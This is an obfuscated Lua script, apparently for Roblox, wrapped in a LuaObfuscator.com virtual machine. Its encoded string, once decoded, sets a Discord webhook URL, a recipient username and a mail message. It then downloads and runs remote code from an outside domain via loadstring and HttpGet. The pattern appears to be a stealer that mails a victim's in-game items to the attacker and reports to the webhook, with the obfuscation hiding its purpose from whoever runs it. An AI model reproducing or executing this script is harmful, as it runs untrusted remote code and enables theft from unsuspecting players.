--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v86=v5(v80,v19);v19=nil;return v86;else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=0;local v82;while true do if (v81==(0 -0)) then v82=(v31/((1 + 1)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(878 -((1552 -(226 + 1044)) + (2590 -1995))))) + (2 -1))) ;return v82-(v82%(1 + 0)) ;end end else local v83=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v83 + v83))>=v83) and (569 -(367 + 201))) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (351 -(87 + 263)) + 2 );v18=v18 + (961 -(892 + 65)) ;return (v40 * ((40022743 -(67 + 113)) -23245347)) + (v39 * (121138 -55602)) + (v38 * (469 -213)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,2 -1 ,15 + (15 -10) ) * (2^(127 -95))) + v41 ;local v45=v20(v42,21,983 -(802 + 150) );local v46=((v20(v42,85 -53 )==(1 -0)) and  -(1 + 0)) or (998 -(915 + 82)) ;if (v45==(18 -(10 + 8))) then if (v44==(0 -0)) then return v46 * 0 ;else v45=(3 -2) + 0 ;v43=0 -0 ;end elseif (v45==(3234 -(1069 + 118))) then return ((v44==(0 -0)) and (v46 * ((1 -0)/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-(1817 -794) ) * (v43 + (v44/((2 + (442 -(416 + 26)))^(843 -(368 + 423))))) ;end local function v25(v47) local v48=0 -0 ;local v49;local v50;while true do if (v48==(0 + 0)) then v49=nil;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=439 -(145 + (1431 -(116 + 1022))) ;end if (v48==(433 -(44 + 386))) then return v6(v50);end if (v48==((6194 -4706) -(998 + 488))) then v50={};for v87=1 + 0 + 0 , #v49 do v50[v87]=v2(v1(v3(v49,v87,v87)));end v48=3;end if (v48==1) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=774 -((733 -532) + 571) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((169 -(9 + 157))==v51) then v58=nil;v59=nil;v51=4;end if ((15 -11)~=v51) then else while true do if (2~=v52) then else local v95=1824 -(1195 + 629) ;while true do if ((0 -0)==v95) then v57=nil;v58=nil;v95=1;end if (v95==1) then v52=244 -(187 + 54) ;break;end end end if (v52==0) then v53=0;v54=nil;v52=781 -(162 + 618) ;end if (v52~=(1 + 0)) then else local v96=0 + 0 ;while true do if (v96==(0 -0)) then v55=nil;v56=nil;v96=1;end if (v96==1) then v52=2 -0 ;break;end end end if (v52~=(1 + 2)) then else v59=nil;while true do local v97=1636 -(1373 + 263) ;while true do if (v97==1) then if (0~=v53) then else local v98=0;local v99;while true do if (v98~=0) then else v99=1000 -(451 + 549) ;while true do if (v99~=(1 + 1)) then else v53=1 -0 ;break;end if (v99==1) then local v162=0;while true do if (v162==(0 -0)) then v56={};v57={v54,v55,nil,v56};v162=1;end if ((342 -(218 + 123))~=v162) then else v99=1583 -(1535 + 46) ;break;end end end if (v99~=0) then else v54={};v55={};v99=1;end end break;end end end break;end if (v97==(0 + 0)) then if (v53==2) then local v100=0;local v101;while true do if (v100~=(0 + 0)) then else v101=560 -(306 + 254) ;while true do local v141=0 + 0 ;while true do if (v141~=0) then else if (v101~=(0 -0)) then else for v164=1468 -(899 + 568) ,v23() do local v165=0;local v166;local v167;while true do if (v165~=(1 + 0)) then else while true do if (v166==0) then v167=v21();if (v20(v167,1,2 -1 )==(603 -(268 + 335))) then local v174=0;local v175;local v176;local v177;local v178;while true do if ((291 -(60 + 230))==v174) then local v180=572 -(426 + 146) ;while true do if (v180==(1 + 0)) then v174=2;break;end if (v180~=(1456 -(282 + 1174))) then else v177=nil;v178=nil;v180=1;end end end if (v174~=0) then else local v181=811 -(569 + 242) ;while true do if (v181~=1) then else v174=2 -1 ;break;end if (v181==0) then v175=0;v176=nil;v181=1;end end end if ((1 + 1)==v174) then while true do if (v175==2) then local v182=0;while true do if (v182~=(1024 -(706 + 318))) then else if (v20(v177,1,1)==(1252 -(721 + 530))) then v178[1273 -(945 + 326) ]=v59[v178[2]];end if (v20(v177,4 -2 ,2)==1) then v178[3]=v59[v178[3 + 0 ]];end v182=1;end if (v182~=1) then else v175=703 -(271 + 429) ;break;end end end if ((0 + 0)==v175) then local v183=1500 -(1408 + 92) ;while true do if (v183==0) then v176=v20(v167,2,1089 -(461 + 625) );v177=v20(v167,4,1294 -(993 + 295) );v183=1 + 0 ;end if (v183==1) then v175=1;break;end end end if (v175==(1174 -(418 + 753))) then if (v20(v177,2 + 1 ,3)==(1 + 0)) then v178[4]=v59[v178[4]];end v54[v164]=v178;break;end if (v175==(1 + 0)) then v178={v22(),v22(),nil,nil};if (v176==0) then local v187=1322 -(1249 + 73) ;local v188;local v189;while true do if (v187==0) then local v195=0 + 0 ;while true do if (1==v195) then v187=1146 -(466 + 679) ;break;end if (v195==0) then v188=0;v189=nil;v195=2 -1 ;end end end if (v187~=1) then else while true do if (v188~=(0 -0)) then else v189=0;while true do if (v189==0) then v178[1903 -(106 + 1794) ]=v22();v178[4]=v22();break;end end break;end end break;end end elseif (v176==(1 + 0)) then v178[1 + 2 ]=v23();elseif (v176==(5 -3)) then v178[7 -4 ]=v23() -((116 -(4 + 110))^(600 -(57 + 527))) ;elseif (v176~=3) then else local v197=1427 -(41 + 1386) ;local v198;local v199;while true do if (v197==(103 -(17 + 86))) then v198=0;v199=nil;v197=1 + 0 ;end if (v197~=1) then else while true do if (v198==(0 -0)) then v199=0 -0 ;while true do if (v199==(166 -(122 + 44))) then v178[5 -2 ]=v23() -(2^16) ;v178[4]=v22();break;end end break;end end break;end end end v175=6 -4 ;end end break;end end end break;end end break;end if (v165==(0 + 0)) then v166=0 + 0 ;v167=nil;v165=1 -0 ;end end end for v168=1,v23() do v55[v168-(66 -(30 + 35)) ]=v28();end v101=1 + 0 ;end if (1==v101) then return v57;end break;end end end break;end end end if (v53~=(1258 -(1043 + 214))) then else local v102=0 -0 ;while true do if (v102==(1212 -(323 + 889))) then local v127=0 -0 ;while true do if (v127~=(581 -(361 + 219))) then else v102=321 -(53 + 267) ;break;end if (v127==(0 + 0)) then v58=v23();v59={};v127=414 -(15 + 398) ;end end end if (v102~=(983 -(18 + 964))) then else for v142=1,v58 do local v143=0;local v144;local v145;local v146;while true do if (v143==(3 -2)) then v146=nil;while true do if (v144==(1 + 0)) then if (v145==1) then v146=v21()~=0 ;elseif (v145==(2 + 0)) then v146=v24();elseif (v145~=3) then else v146=v25();end v59[v142]=v146;break;end if (v144==0) then local v171=0;local v172;while true do if (v171==0) then v172=0;while true do if (v172==1) then v144=1;break;end if (v172==(850 -(20 + 830))) then local v173=0;while true do if (v173~=(1 + 0)) then else v172=127 -(116 + 10) ;break;end if (v173==0) then local v179=0 + 0 ;while true do if (v179~=1) then else v173=739 -(542 + 196) ;break;end if ((0 -0)==v179) then v145=v21();v146=nil;v179=1;end end end end end end break;end end end end break;end if (v143==(0 + 0)) then local v163=0 + 0 ;while true do if (v163~=(1 + 0)) then else v143=1;break;end if (v163==(0 -0)) then v144=0;v145=nil;v163=1;end end end end end v57[7 -4 ]=v21();v102=1553 -(1126 + 425) ;end if (v102~=(407 -(118 + 287))) then else v53=2;break;end end end v97=1;end end end break;end end break;end if (v51~=0) then else v52=0 -0 ;v53=nil;v51=1;end if (v51==2) then v56=nil;v57=nil;v51=1124 -(118 + 1003) ;end if (v51==1) then v54=nil;v55=nil;v51=2;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v84=0,v74 do if (v84>=v68) then v72[v84-v68 ]=v73[v84 + 1 ];else v76[v84]=v73[v84 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v85=0;while true do if (v85==1) then if (v79<=9) then if (v79<=4) then if (v79<=1) then if (v79>0) then v76[v78[2]]=v78[3];else do return;end end elseif (v79<=2) then local v105=v78[2];local v106=v76[v78[3]];v76[v105 + 1 ]=v106;v76[v105]=v106[v78[4]];elseif (v79==3) then v70=v78[3];else do return;end end elseif (v79<=6) then if (v79>5) then local v110=0;local v111;while true do if (v110==0) then v111=v78[2];v76[v111]=v76[v111](v13(v76,v111 + 1 ,v71));break;end end else v62[v78[3]]=v76[v78[2]];end elseif (v79<=7) then v70=v78[3];elseif (v79==8) then v62[v78[3]]=v76[v78[2]];elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=14) then if (v79<=11) then if (v79==10) then v76[v78[2]]=v78[3];else local v117=0;local v118;local v119;while true do if (1==v117) then v76[v118 + 1 ]=v119;v76[v118]=v119[v78[4]];break;end if (v117==0) then v118=v78[2];v119=v76[v78[3]];v117=1;end end end elseif (v79<=12) then local v120=0;local v121;local v122;local v123;local v124;while true do if (v120==1) then v71=(v123 + v121) -1 ;v124=0;v120=2;end if (v120==0) then v121=v78[2];v122,v123=v69(v76[v121](v13(v76,v121 + 1 ,v78[3])));v120=1;end if (v120==2) then for v159=v121,v71 do v124=v124 + 1 ;v76[v159]=v122[v124];end break;end end elseif (v79==13) then local v132=v78[2];local v133,v134=v69(v76[v132](v13(v76,v132 + 1 ,v78[3])));v71=(v134 + v132) -1 ;local v135=0;for v155=v132,v71 do v135=v135 + 1 ;v76[v155]=v133[v135];end else v76[v78[2]]=v62[v78[3]];end elseif (v79<=16) then if (v79>15) then v76[v78[2]]=v62[v78[3]];elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=17) then v76[v78[2]]();elseif (v79>18) then local v139=v78[2];v76[v139]=v76[v139](v13(v76,v139 + 1 ,v71));else v76[v78[2]]();end v70=v70 + 1 ;break;end if (v85==0) then v78=v66[v70];v79=v78[1];v85=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132343739303937312O30333637322O3931382F37366866724C7032384F70504C2O71736845737453504D2D6E45436E79457669572D6F676C53497144753978526A6257737A554B7765516E5A574741654E586674336E71030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031B3O00682O7470733A2O2F65676F72696B7573612E73706163652F2O746403083O00557365726E616D65030D3O00426F6E676F5F446F6D696E696B030B3O004D61696C4D652O73616765030A3O0064616E7961206265737400163O0012013O00013O0026093O000D000100020004033O000D0001001201000100043O001205000100033O00120E000100053O00120E000200063O002002000200020007001201000400084O000D000200044O001300013O00022O00120001000100010004033O001500010026093O0001000100010004033O000100010012010001000A3O001205000100093O0012010001000C3O0012050001000B3O0012013O00023O0004033O000100016O00017O00",v9(),...);
